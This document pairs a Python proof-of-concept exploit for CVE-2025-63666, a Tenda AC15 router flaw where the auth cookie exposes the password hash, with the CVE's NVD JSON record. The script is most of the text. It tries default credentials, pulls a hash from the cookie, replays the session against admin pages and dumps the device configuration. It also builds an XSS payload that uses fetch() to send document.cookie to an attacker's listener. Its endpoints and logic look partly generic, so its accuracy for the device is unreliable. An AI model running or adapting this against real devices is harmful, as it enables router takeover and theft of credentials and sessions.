CVE-2025-63666

#!/usr/bin/env python3 # CVE-2025-63666 PoC - Tenda AC15 Authentication Cookie Hash Exposure # This PoC demonstrates the cookie stealing and replay attack import requests import hashlib import re from urllib.parse import urljoin def exploit_tenda_ac15(target_ip, attacker_cookie_listener=None): """ Exploit CVE-2025-63666 on Tenda AC15 router Args: target_ip: IP address of the vulnerable Tenda AC15 router attacker_cookie_listener: URL to receive stolen cookies (for XSS attack) """ base_url = f"http://{target_ip}" # Step 1: Try to get the authentication cookie print("[*] Step 1: Obtaining authentication cookie...") login_url = urljoin(base_url, "/login") # Attempt to login with default credentials credentials = [ ("admin", "admin"), ("admin", "password"), ("root", "root") ] session = requests.Session() valid_session = None for username, password in credentials: login_data = { "username": username, "password": password } try: response = session.post(login_url, data=login_data, timeout=5) if response.status_code == 200: cookies = session.cookies.get_dict() if cookies: print(f"[+] Logged in with {username}:{password}") print(f"[+] Cookie obtained: {cookies}") valid_session = session break except Exception as e: print(f"[-] Login attempt failed: {e}") if not valid_session: print("[-] Could not obtain valid session") return None # Step 2: Analyze the cookie for exposed password hash print("\n[*] Step 2: Analyzing cookie for password hash exposure...") cookie_str = str(valid_session.cookies.get_dict()) # The vulnerable cookie contains password hash in a specific format # Format: sessionID + low_entropy_suffix + password_hash hash_pattern = re.findall(r'[a-f0-9]{64}', cookie_str) if hash_pattern: print(f"[!] Password hash found in cookie: {hash_pattern[0]}") print("[!] This hash can be used for offline cracking or replay") # Step 3: Replay the cookie to access protected resources print("\n[*] Step 3: Replaying cookie to access protected resources...") protected_endpoints = [ "/admin/index.html", "/admin/system_status", "/admin/wireless_settings", "/admin/network_settings" ] for endpoint in protected_endpoints: try: response = valid_session.get(urljoin(base_url, endpoint), timeout=5) if response.status_code == 200: print(f"[+] Successfully accessed {endpoint}") if "password" in response.text.lower() or "admin" in response.text.lower(): print(f"[!] Sensitive data found in response from {endpoint}") else: print(f"[-] Access denied to {endpoint} (Status: {response.status_code})") except Exception as e: print(f"[-] Error accessing {endpoint}: {e}") # Step 4: Extract device configuration print("\n[*] Step 4: Extracting device configuration...") config_url = urljoin(base_url, "/admin/getConfig") try: response = valid_session.get(config_url, timeout=5) if response.status_code == 200: print(f"[+] Device configuration extracted:") print(response.text[:500]) except: pass return valid_session.cookies.get_dict() def generate_xss_payload(listener_url): """ Generate XSS payload for stealing cookies in victim's browser """ payload = f'''<script> fetch('{listener_url}?cookie=' + document.cookie); </script>''' return payload if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve-2025-63666.py <target_ip>") print("Example: python cve-2025-63666.py 192.168.0.1") sys.exit(1) target = sys.argv[1] print(f"[*] Target: {target}") print(f"[*] Exploiting CVE-2025-63666\n") exploit_tenda_ac15(target)

{"cve": {"id": "CVE-2025-63666", "sourceIdentifier": "[email protected]", "published": "2025-11-12T15:15:38.583", "lastModified": "2025-11-17T18:59:20.080", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tenda AC15 v15.03.05.18_multi) issues an authentication cookie that exposes the account password hash to the client and uses a short, low-entropy suffix as the session identifier. An attacker with network access or the ability to run JS in a victim browser can steal the cookie and replay it to access protected resources."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac15_firmware:15.03.05.18:*:*:*:*:*:*:*", "matchCriteriaId": "56881C41-A993-45CC-BAE6-E9DE17FA56E2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac15:-:*:*:*:*:*:*:*", "matchCriteriaId": "B73E7C1C-F121-486A-8B15-E97EA0C219A5"}]}]}], "references": [{"url": "https://github.com/Remenis/CVE-2025-63666", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}